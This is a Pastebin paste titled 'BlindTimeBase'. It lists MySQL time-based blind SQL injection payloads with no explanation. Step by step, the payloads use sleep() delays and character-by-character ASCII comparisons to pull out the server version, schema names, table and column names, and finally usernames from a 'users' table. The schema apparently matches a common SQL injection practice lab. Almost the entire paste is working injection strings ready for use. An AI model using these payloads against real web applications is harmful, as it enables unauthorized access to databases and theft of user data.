API tools faq
paste
Advertisement
Ng4P4L

BlindTimeBase

Ng4P4L
Sep 6th, 2021
49
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.43 KB | None | 0 0
raw download clone embed print report diff
  1. 1' AND sleep(5)--+
  2.  
  3. Retrieve version:
  4. 1' AND IF((SELECT ascii(substr(version(),1,1))) = 53,sleep(10),NULL)--+
  5.  
  6. Retrieve version using LIKE:
  7. 1' AND IF((SELECT version()) LIKE "5%",sleep(10),NULL)--+
  8.  
  9.  
  10. Retrieve databases:
  11. 1' AND IF(((ascii(substr((SELECT schema_name FROM information_schema.schemata LIMIT 7,1),1,1)))) = 115,sleep(10),NULL)--+ //s
  12. 1' AND IF(((ascii(substr((SELECT schema_name FROM information_schema.schemata LIMIT 7,1),2,1)))) = 101,sleep(10),NULL)--+ //e
  13. 1' AND IF(((ascii(substr((SELECT schema_name FROM information_schema.schemata LIMIT 7,1),3,1)))) = 99,sleep(10),NULL)--+ //c
  14. 1' AND IF(((ascii(substr((SELECT schema_name FROM information_schema.schemata LIMIT 7,1),4,1)))) = 117,sleep(10),NULL)--+ //u
  15.  
  16. Retrieve Tables
  17. 1' AND IF(((ascii(substr((SELECT TABLE_NAME FROM information_schema.TABLES WHERE table_schema="security" LIMIT 0,1),1,1)))) = 101,sleep(10),NULL)--+ //e
  18. 1' AND IF(((ascii(substr((SELECT TABLE_NAME FROM information_schema.TABLES WHERE table_schema="security" LIMIT 0,1),2,1)))) = 109,sleep(10),NULL)--+ //m
  19. 1' AND IF(((ascii(substr((SELECT TABLE_NAME FROM information_schema.TABLES WHERE table_schema="security" LIMIT 0,1),3,1)))) = 97,sleep(10),NULL)--+ //a
  20.  
  21. Next Table
  22. 1' AND IF(((ascii(substr((SELECT TABLE_NAME FROM information_schema.TABLES WHERE table_schema="security" LIMIT 3,1),1,1)))) = 117,sleep(10),NULL)--+ //u
  23. 1' AND IF(((ascii(substr((SELECT TABLE_NAME FROM information_schema.TABLES WHERE table_schema="security" LIMIT 3,1),2,1)))) = 115,sleep(10),NULL)--+ //s
  24. 1' AND IF(((ascii(substr((SELECT TABLE_NAME FROM information_schema.TABLES WHERE table_schema="security" LIMIT 3,1),3,1)))) = 101,sleep(10),NULL)--+ //e
  25. 1' AND IF(((ascii(substr((SELECT TABLE_NAME FROM information_schema.TABLES WHERE table_schema="security" LIMIT 3,1),4,1)))) = 114,sleep(10),NULL)--+ //r
  26. 1' AND IF(((ascii(substr((SELECT TABLE_NAME FROM information_schema.TABLES WHERE table_schema="security" LIMIT 3,1),5,1)))) = 115,sleep(10),NULL)--+
  27.  
  28.  
  29. Retrieve columns
  30. 1' AND IF(((ascii(substr((SELECT column_name FROM information_schema.COLUMNS WHERE TABLE_NAME="users" LIMIT 0,1),1,1)))) = 117,sleep(10),NULL)--+ //u
  31. 1' AND IF(((ascii(substr((SELECT column_name FROM information_schema.COLUMNS WHERE TABLE_NAME="users" LIMIT 0,1),2,1)))) = 115,sleep(10),NULL)--+ //s
  32.  
  33.  
  34.  
  35. Retrieve data from another database:
  36.  
  37. 1' AND IF(((ascii(substr((SELECT username FROM security.users LIMIT 0,1),1,1)))) = 68,sleep(10),NULL)--+
  38.  
  39.  
  40.  
  41.  
  42.  
  43.  
  44.  
  45.  
  46.  
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!